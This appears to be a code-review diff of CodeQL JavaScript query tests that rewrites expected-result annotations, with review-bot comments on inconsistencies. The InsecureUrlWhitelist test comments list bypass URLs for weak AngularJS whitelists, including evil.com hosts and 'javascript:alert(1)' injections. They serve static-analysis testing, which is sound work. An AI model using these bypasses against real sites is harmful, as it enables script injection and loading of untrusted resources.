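Review bot: The second `.config` case in DisablingSce.js, `.config(['otherProvider', function($sceProvider) { $sceProvider.enabled(false); }])`, is left with no comment at all, and it is the one negative case in this file that reads like a true positive. It calls `enabled(false)` on a parameter named `$sceProvider`, and is presumably expected to stay clean only because the injection array names `otherProvider`. With the bare `// OK` removed, a later reader could take the absent `// $ Alert` for a dropped expectation rather than a deliberate negative for the Strict Contextual Escaping check. This commit already keeps explanatory markers elsewhere (`// OK - special case`), so I would keep one here too: `$sceProvider.enabled(false); // OK - 'otherProvider' is injected, not $sceProvider`.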
@@ -11,68 +11,68 @@ angular.module('myModule', []) ; angular.module('myModule2', []) - .controller('c0', function(factoryId){}) // OK - .controller('c1', function(serviceId){}) // OK - .controller('c2', function(valueId){}) // OK - .controller('c3', function(constantId){}) // OK - .controller('c4', function(providerId){}) // OK - .controller('c5', function($http){}) // OK - .controller('c6', function($provider){}) // NOT OK - .controller('c7', function($scope){}) // OK - .controller('c8', function($compile){}) // OK - .controller('c9', function(UNKNOWN){}) // OK - .controller('c10', function(providerIdProvider){}) // NOT OK - .controller('c11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .controller('c12', function($provide){}) // OK (special case) - .controller('c13', function(providerId2Provider){}) // NOT OK + .controller('c0', function(factoryId){}) + .controller('c1', function(serviceId){}) + .controller('c2', function(valueId){}) + .controller('c3', function(constantId){}) + .controller('c4', function(providerId){}) + .controller('c5', function($http){}) + .controller('c6', function($provider){}) // $ Alert + .controller('c7', function($scope){}) + .controller('c8', function($compile){}) + .controller('c9', function(UNKNOWN){}) + .controller('c10', function(providerIdProvider){}) // $ Alert + .controller('c11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .controller('c12', function($provide){}) // OK - special case + .controller('c13', function(providerId2Provider){}) // $ Alert - .factory('s0', function(factoryId){}) // OK - .factory('s1', function(serviceId){}) // OK - .factory('s2', function(valueId){}) // OK - .factory('s3', function(constantId){}) // OK - .factory('s4', function(providerId){}) // OK - .factory('s5', function($http){}) // OK - .factory('s6', function($provider){}) // NOT OK - .factory('s7', function($scope){}) // NOT OK - .factory('s8', function($compile){}) // OK - 
.factory('s9', function(UNKNOWN){}) // OK - .factory('s10', function(providerIdProvider){}) // NOT OK - .factory('s11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .factory('s12', function($provide){}) // OK (special case) - .factory('s13', function(providerId2Provider){}) // NOT OK + .factory('s0', function(factoryId){}) + .factory('s1', function(serviceId){}) + .factory('s2', function(valueId){}) + .factory('s3', function(constantId){}) + .factory('s4', function(providerId){}) + .factory('s5', function($http){}) + .factory('s6', function($provider){}) // $ Alert + .factory('s7', function($scope){}) // $ Alert + .factory('s8', function($compile){}) + .factory('s9', function(UNKNOWN){}) + .factory('s10', function(providerIdProvider){}) // $ Alert + .factory('s11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .factory('s12', function($provide){}) // OK - special case + .factory('s13', function(providerId2Provider){}) // $ Alert - .run(function(factoryId){}) // OK - .run(function(serviceId){}) // OK - .run(function(valueId){}) // OK - .run(function(constantId){}) // OK - .run(function(providerId){}) // OK - .run(function($http){}) // OK - .run(function($provider){}) // NOT OK - .run(function($scope){}) // NOT OK - .run(function($compile){}) // OK - .run(function(UNKNOWN){}) // OK - .run(function(providerIdProvider){}) // NOT OK - .run(function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .run(function($provide){}) // OK (special case) - .run(function(providerId2Provider){}) // NOT OK + .run(function(factoryId){}) + .run(function(serviceId){}) + .run(function(valueId){}) + .run(function(constantId){}) + .run(function(providerId){}) + .run(function($http){}) + .run(function($provider){}) // $ Alert + .run(function($scope){}) // $ Alert + .run(function($compile){}) + .run(function(UNKNOWN){}) + .run(function(providerIdProvider){}) // $ Alert + .run(function(providerIdProvider, UNKNOWN){}) // $ 
Alert - but only one error + .run(function($provide){}) // OK - special case + .run(function(providerId2Provider){}) // $ Alert - .config(function(factoryId){}) // NOT OK - .config(function(serviceId){}) // NOT OK - .config(function(valueId){}) // NOT OK - .config(function(constantId){}) // OK - .config(function(providerId){}) // NOT OK - .config(function($http){}) // NOT OK - .config(function($provider){}) // OK - .config(function($scope){}) // NOT OK - .config(function($compile){}) // OK - .config(function(UNKNOWN){}) // OK - .config(function(providerIdProvider){}) // OK - .config(function(providerId, UNKNOWN){}) // NOT OK, but only one error - .config(function($provide){}) // OK (special case) - .config(function(valueId2){}) // NOT OK + .config(function(factoryId){}) // $ Alert + .config(function(serviceId){}) // $ Alert + .config(function(valueId){}) // $ Alert + .config(function(constantId){}) + .config(function(providerId){}) // $ Alert + .config(function($http){}) // $ Alert + .config(function($provider){}) + .config(function($scope){}) // $ Alert + .config(function($compile){}) + .config(function(UNKNOWN){}) + .config(function(providerIdProvider){}) + .config(function(providerId, UNKNOWN){}) // $ Alert - but only one error + .config(function($provide){}) // OK - special case + .config(function(valueId2){}) // $ Alert // service: same restrcitions as .factory - .service('s14', function(factoryId){}) // OK - .service('s15', function($provider){}) // NOT OK + .service('s14', function(factoryId){}) + .service('s15', function($provider){}) // $ Alert ; diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 713e36e52233..6ede37fed7cc 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js 
@@ -1,24 +1,24 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // BAD (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // BAD (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // BAD (exploit: https://evil.com/?ignore=://example.com/a) - "https://example.**", // BAD (exploit: https://example.evil.com or http://example.:foo@evil.com) - "https://example.*", // BAD (exploit: https://example.UnexpectedTLD) + "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD - "https://example.com", // OK - "https://example.com/**", // OK - "https://example.com/*", // OK - "https://example.com/foo/*", // OK - "https://example.com/foo/**", // OK - "https://example.com/foo/*/bar", // OK - "https://example.com/foo/**/bar", // OK - "https://example.com/?**", // OK - "https://example.com/?**://example.com", // OK + "https://example.com", + "https://example.com/**", + "https://example.com/*", + "https://example.com/foo/*", + "https://example.com/foo/**", + "https://example.com/foo/*/bar", + "https://example.com/foo/**/bar", + "https://example.com/?**", + "https://example.com/?**://example.com", "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // BAD (exploit http://wwwaexample.org (dots are not escaped)) + /http:\/\/www.example.org/g // $ Alert 
- (exploit http://wwwaexample.org (dots are not escaped)) ]); }); diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js index 65d3e74ceef0..629b62d5b08e 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js @@ -1,27 +1,27 @@ (function(){ - function injected1(name){} // NOT OK + function injected1(name){} // $ Alert angular.module('app1').controller('controller1', injected1); - function injected2(name){} // OK + function injected2(name){} injected2.$inject = ['name']; angular.module('app2').controller('controller2', injected2); - function injected3(name){} // OK + function injected3(name){} angular.module('app3').controller('controller3', ['name', injected3]); - angular.module('app4').controller('controller4', function(){}); // OK + angular.module('app4').controller('controller4', function(){}); - angular.module('app5').controller('controller5', function(name){}); // NOT OK + angular.module('app5').controller('controller5', function(name){}); // $ Alert - function injected6(){} // OK + function injected6(){} angular.module('app6').controller('controller6', injected6); - function notInjected7(name){} // OK + function notInjected7(name){} var obj7 = { controller: notInjected7 }; - function injected8(name){} // OK (false negative: we do not track through properties) + function injected8(name){} // OK - false negative: we do not track through properties var obj8 = { controller: injected8 }; 
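Review bot: The regular-expression entry that closes the `resourceUrlWhitelist` array in InsecureUrlWhitelist/tst.js is now annotated `// $ Alert`, while the unchanged `// not flagged:` comment just above it still says the opposite, so the file contradicts itself about whether the query reports the unescaped-dot pattern. If the query does not report it, the line should read `// $ MISSING: Alert - dots are not escaped`; if it does, the `// not flagged:` comment should go. The same applies to `function injected8(name){} // OK - false negative: ...` in the first hunk of missing-explicit-injection.js, where a known false negative is better recorded as `// $ MISSING: Alert - we do not track through properties` than as `OK`. Separately, the first two whitelist entries and the last keep the parentheses in `- (exploit: ...)` while the three in between drop them.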
@@ -29,14 +29,14 @@ var $injector = angular.injector(); - function injected9(name){} // NOT OK + function injected9(name){} // $ Alert $injector.invoke(injected9) - function injected10(name){} // OK + function injected10(name){} injected10.$inject = ['name']; $injector.invoke(injected10) - function injected11(name){} // OK + function injected11(name){} $injector.invoke(['name', injected11]) })(); diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js index 942a9ab1239e..9987e60d0ea5 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js 
@@ -1,36 +1,36 @@ (function(){ - function $Injected1(name){} // OK + function $Injected1(name){} $Injected1.$inject = ['name']; angular.module('app1').controller('controller1', $Injected1); - function $Injected2(name){} // NOT OK + function $Injected2(name){} // $ Alert $Injected2.$inject = ['name']; angular.module('app2').controller('controller2', ['name', $Injected2]); - function $Injected3(name){} // NOT OK + function $Injected3(name){} // $ Alert $Injected3.$inject = ['name']; $Injected3.$inject = ['name']; angular.module('app3').controller('controller3', $Injected3); - function not$Injected4(name){} // OK + function not$Injected4(name){} angular.module('app4').controller('controller4', not$Injected4); - function not$Injected5(name){} // OK + function not$Injected5(name){} angular.module('app5').controller('controller5', ['name', not$Injected5]); - function $Injected6(name){} // OK (because it never becomes registered) + function $Injected6(name){} // OK - because it never becomes registered $Injected6.$inject = ['name']; $Injected6.$inject = ['name']; - function not$Injected7(name){} // OK + function not$Injected7(name){} angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', not$Injected7); - angular.module('app8').controller('controller8', function inline8(name){}); // OK + angular.module('app8').controller('controller8', function inline8(name){}); - angular.module('app9').controller('controller9', ['name', function inline9(name){}]); // OK + angular.module('app9').controller('controller9', ['name', function inline9(name){}]); - function $Injected10(name){ // NOT OK (alert formatting for multi-line function) + function $Injected10(name){ // $ Alert - alert formatting for multi-line function } $Injected10.$inject = ['name']; angular.module('app10').controller('controller10', ['name', $Injected10]); 
diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js index f35cc62947ed..14e94d23d6d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js 
@@ -1,28 +1,28 @@ (function(){ - function f1(used2, unused5) {used2;} // OK (suppressed by js/unused-parameter) + function f1(used2, unused5) {used2;} // OK - suppressed by js/unused-parameter // this function avoid suppression from js/unused-parameter by explicitly targeting one its weaknesses - function f2(unused7, used3) {used3;} // NOT OK + function f2(unused7, used3) {used3;} // $ Alert this.f2 = f2; angular.module('app1', []) .run(function() {}) - .run(function(unused1) {}) // OK (suppressed by js/unused-parameter) - .run(function(unused2, unused3) {}) // OK (suppressed by js/unused-parameter) - .run(function(used1, unused4) {used1;}) // OK (suppressed by js/unused-parameter) + .run(function(unused1) {}) // OK - suppressed by js/unused-parameter + .run(function(unused2, unused3) {}) // OK - suppressed by js/unused-parameter + .run(function(used1, unused4) {used1;}) // OK - suppressed by js/unused-parameter .run(f1) - .run(["unused6", function() {}]) // NOT OK + .run(["unused6", function() {}]) // $ Alert .run(f2) - .run(["used2", "unused9", function(used2) {}]) // NOT OK - .run(["unused10", "unused11", function() {}]) // NOT OK - .run(["used2", "unused12", function(used2) { // NOT OK (alert formatting for multi-line function) + .run(["used2", "unused9", function(used2) {}]) // $ Alert + .run(["unused10", "unused11", function() {}]) // $ Alert + .run(["used2", "unused12", function(used2) { // $ Alert - alert formatting for multi-line function }]) ; })(); angular.module('app2') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html index 6e81b0da32a4..d1049d6bf1d9 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html 
@@ -4,13 +4,12 @@ - - Help + Help - + Help diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html index 485af478d186..6a4f04ba2e1e 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html @@ -1,4 +1,3 @@
    - - Help + Help
    diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html index e461a5d795bc..0111acde5e8a 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html @@ -1,4 +1,3 @@ - - Help + Help diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js index 877069be03d8..b6497788dd2b 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js +++ b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js @@ -1,2 +1,2 @@ -// OK + // if you want a specific version so specifiy it in object below : version=XXX diff --git a/javascript/ql/test/query-tests/DOM/Alert/alert.js b/javascript/ql/test/query-tests/DOM/Alert/alert.js index 04b0c2e44f2b..dee66a1c186a 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/alert.js +++ b/javascript/ql/test/query-tests/DOM/Alert/alert.js @@ -1,4 +1,4 @@ -alert("hi!"); // NOT OK -x.alert("hi!"); // OK -new alert(); // OK -function alert() { } // OK +alert("hi!"); // $ Alert +x.alert("hi!"); +new alert(); +function alert() { } diff --git a/javascript/ql/test/query-tests/DOM/HTML/tst.js b/javascript/ql/test/query-tests/DOM/HTML/tst.js index df60053b8b93..aec3870ab04d 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/tst.js +++ b/javascript/ql/test/query-tests/DOM/HTML/tst.js @@ -1,25 +1,19 @@ -// OK: we don't know whether the two elements are added to the same document +// OK - we don't know whether the two elements are added to the same document var div1 =
    ; var div2 =
    ; -// not OK -Semmle; +Semmle; // $ Alert -// not OK -Semmle; +Semmle; // $ Alert -// not OK -
    ; +
    ; // $ Alert
    ; -// not OK -Semmle; +Semmle; // $ Alert + -// OK
    ; -// not OK -var div3 =
    ; +var div3 =
    ; // $ Alert -// not OK -var div4 =
    ; +var div4 =
    ; // $ Alert diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js index 1f1e43ab1550..38ec3b464087 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js @@ -1,7 +1,7 @@ function foo() { return "noopener noreferrer"; } var o = { rel: "noopener noreferrer "}; -// OK + Example; Example; Example; @@ -9,42 +9,39 @@ var o = { rel: "noopener noreferrer "}; Example; Example; -// OK, because of constant URL +// OK - because of constant URL Example; Example; Example; -// NOT OK, because of dynamic URL -Example; +Example; // $ Alert - because of dynamic URL Example; Example; function f() { - // OK + var a1 = $("", { href: "http://example.com" }); a1.attr("target", "_blank"); - // OK + var a2 = $("", { href: "http://example.com" }); a2.attr("target", "_blank"); a2.attr(computedName(), "noopener"); - // NOT OK - var a3 = $("", { href: "{{X}}" }); + var a3 = $("", { href: "{{X}}" }); // $ Alert a3.attr("target", "_blank"); - // OK + var a4 = $(""); a4[f()] = g(); a4.attr("target", "_blank"); - // NOT OK - var a5 = $(""); + var a5 = $(""); // $ Alert a5.attr("href", g()); a5.attr("target", "_blank"); } -// OK, because of dynamic URL with fixed host +// OK - because of dynamic URL with fixed host Example; Example; Example; @@ -52,20 +49,20 @@ function f() { Example; Example; -// OK, because of dynamic URL with relative path +// OK - because of dynamic URL with relative path Example; Example; Example; Example; Example; -// OK, Flask application with internal links +// OK - Flask application with internal links Example; Example; Example; -// OK, nunjucks template +// OK - nunjucks template Example; -// OK, Django application with internal links +// OK - Django application with internal links Example 
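Review bot: In the second hunk of TargetBlank/tst.js the removed heading `// NOT OK, because of dynamic URL` stood above three consecutive link expressions, and the replacement `// $ Alert - because of dynamic URL` is attached only to the first of them. The markup of those lines is not visible here, so this may be correct, but it should be checked against the expected results. If the other two are also results, each needs its own `// $ Alert`; if they are not, a short `// OK - <reason>` on them would keep what the group heading used to imply.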
diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js index c381f60bc272..356f0e111a06 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js @@ -1,10 +1,10 @@ function f() { if (arguments[0].isArray()) - arguments = arguments[0]; // NOT OK + arguments = arguments[0]; // $ Alert } function g(x, y) { - var arguments = [y, x]; // NOT OK + var arguments = [y, x]; // $ Alert } (function (){ diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts index d69f8eca109b..855c23cdb118 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts @@ -1,3 +1,3 @@ -declare function ambientArguments(arguments: string[]): string; // OK +declare function ambientArguments(arguments: string[]): string; -declare function ambientArgumentsVarArgs(...arguments: string[]): string; // OK +declare function ambientArgumentsVarArgs(...arguments: string[]): string; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js index 93bb382719f5..5a8866778884 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -class C {} +class C {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js index 5f022c603b78..3997e1366e7f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js 
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js @@ -1,4 +1,4 @@ -// OK: `const` is block scoped in ECMAScript 2015 +// OK - `const` is block scoped in ECMAScript 2015 function f() { { const val = 1; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js index e23c770f2ad1..130f0278d657 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -function C() {} +function C() {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js index 929a95754f81..97886fd35f0f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js @@ -1,2 +1,2 @@ -// OK + const s = "there"; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js index c68d2380e017..b53a987d8a4e 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js @@ -1,23 +1,19 @@ const x = 23, y = 42; -// NOT OK -x = 42; +x = 42; // $ Alert -// NOT OK -y = 23; +y = 23; // $ Alert -// NOT OK -var y = -1; +var y = -1; // $ Alert -// NOT OK -++x; +++x; // $ Alert var z = 56; -// OK + z = 72; -// OK + const s = "hi"; (function (){ diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js index 00ca7e51f7cf..c1060f0280ab 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js 
+++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js @@ -1,12 +1,11 @@ for (var iter in Iterator(aExtraHeaders)) { - // NOT OK - var key = iter[0], key = iter[1]; + var key = iter[0], key = iter[1]; // $ Alert xhr.setRequestHeader(key, value); } -// OK + var tmp = f(), tmp = tmp + 19; -// OK + var a, b, a = 42; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js index 6628880d6c55..7f06809d2f3f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js @@ -1,31 +1,30 @@ -// NOT OK -g = 23; +g = 23; // $ Alert + -// OK h = 23; alert(h); -// OK + uid = 0; function incr() { return uid++; } -// OK + function foo() { var x; x = 0; } -// OK + onload = function() {} -// OK + global = 42; -// OK + prop = 42; -// OK + /*global otherGlobal*/ otherGlobal = 56; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts index c97993c88a51..3dfc6b0e2e54 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts @@ -1,11 +1,11 @@ import dummy from 'dummy'; -var key1 = "key1"; // OK +var key1 = "key1"; export class NoConstructor { [key1] = 4; } -var key2 = "key2"; // OK +var key2 = "key2"; export class WithConstructor { [key2] = 4; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts index 90199399794d..2f93aba1b9c7 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts 
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts @@ -1,16 +1,16 @@ -import { Foo } from "./exportSymbol" // OK +import { Foo } from "./exportSymbol" export interface FooMap { - [Foo]: number; // OK + [Foo]: number; } -const Bar = "Bar"; // OK +const Bar = "Bar"; export interface BarMap { [Bar]: number; } -const Baz = "Baz"; // OK +const Baz = "Baz"; if (false) { Baz; @@ -18,7 +18,7 @@ if (false) { function getBaz(): typeof Baz { return null; } -class C {} // OK +class C {} if (false) { C; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts index 6481a749c40c..007bf441d6df 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts @@ -1,5 +1,5 @@ -var C1 = global.C1; // OK -var C2 = global.C2; // OK +var C1 = global.C1; +var C2 = global.C2; class C extends C1 {} export default class extends C2 {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts index 5c6b48f8796c..c8dba3d68896 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts @@ -1,3 +1,3 @@ -var C1 = global.C1; // OK +var C1 = global.C1; export default function(x=C1) {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js index eab95b4787f6..68b79aac8e68 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js 
@@ -1,4 +1,4 @@ -const React = require('react'); // OK: used in `extends` clause below +const React = require('react'); // OK - used in `extends` clause below class Foo extends React.Component { } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js index da26a3557ade..8e923b565ee2 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js @@ -2,7 +2,7 @@ function f() { let y = false; for (const x of [1, 2, 3]) { if (x > 0) { - y = true; // OK + y = true; continue; } return; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts index 4335cd3880aa..3d00634499f8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts @@ -9,5 +9,5 @@ namespace a.b.q { registerSomething(c); - function foo() {} // OK + function foo() {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts index d2be60c12874..255c80093466 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts 
@@ -1,13 +1,13 @@ export function foo() { - function bar(x: number): number; // OK - function bar(x: string): string; // OK - function bar(x: any) { // OK + function bar(x: number): number; + function bar(x: string): string; + function bar(x: any) { return x; } - function baz(x: number): number; // OK - function baz(x: string): string; // OK - function baz(x: any) { // NOT OK, overwritten before use + function baz(x: number): number; + function baz(x: string): string; + function baz(x: any) { // $ Alert - overwritten before use return x; } baz = (x) => x; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js index f19b1656da23..13e260a5de0e 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js @@ -1,17 +1,15 @@ function f() { - // OK: initialization to default value + // OK - initialization to default value var x = null, y = undefined, z; x = {}; - // NOT OK - y = 23; + y = 23; // $ Alert y = 42; for (var p in x) y+p; - // OK: assignment to global + // OK - assignment to global global = 42; - // NOT OK - var a = 23; a = 42; - // OK: captured variable + var a = 23; a = 42; // $ Alert + // OK - captured variable var b = 42; return function() { return b%2 @@ -20,14 +18,14 @@ function f() { function g() { var x; - // OK + x = 23, x += 19; - // OK + var y = 42; } function h() { - // OK + var x = false; try { this.mayThrow(); @@ -37,7 +35,7 @@ function h() { } function k(data) { - // OK + for(var i=0;i .5) - // OK + i = 23; } } 
@@ -87,11 +85,11 @@ function s() { var container = document.createElement("div"), div = document.createElement("div"); doStuffWith(container, div); - // OK + container = div = null; } -// OK: the function expression could be made anonymous, but it's not +// OK - the function expression could be made anonymous, but it's not // worth flagging this as a violation defineGetter(req, 'subdomains', function subdomains() { var hostname = this.hostname; @@ -103,7 +101,7 @@ defineGetter(req, 'subdomains', function subdomains() { return subdomains.slice(offset); }); -// OK: assigning default values +// OK - assigning default values function t() { var x; x = false; @@ -112,7 +110,7 @@ function t() { x = 42; return x; } -// OK: unnecessary initialisation as type hint +// OK - unnecessary initialisation as type hint function u() { var x; x = []; @@ -120,7 +118,7 @@ function u() { x = 42; return x; } -// OK: assigning `undefined` +// OK - assigning `undefined` function v() { var x; x = void 0; @@ -134,7 +132,7 @@ function v() { return x; } -// OK: assignments in dead code not flagged +// OK - assignments in dead code not flagged !function() { return; var x; @@ -159,7 +157,7 @@ function v() { }); (function() { - let [x] = [0], // OK, but flagged due to destructuring limitations + let [x] = [0], // $ SPURIOUS: Alert - flagged due to destructuring limitations y = 0; x = 42; y = 87; diff --git 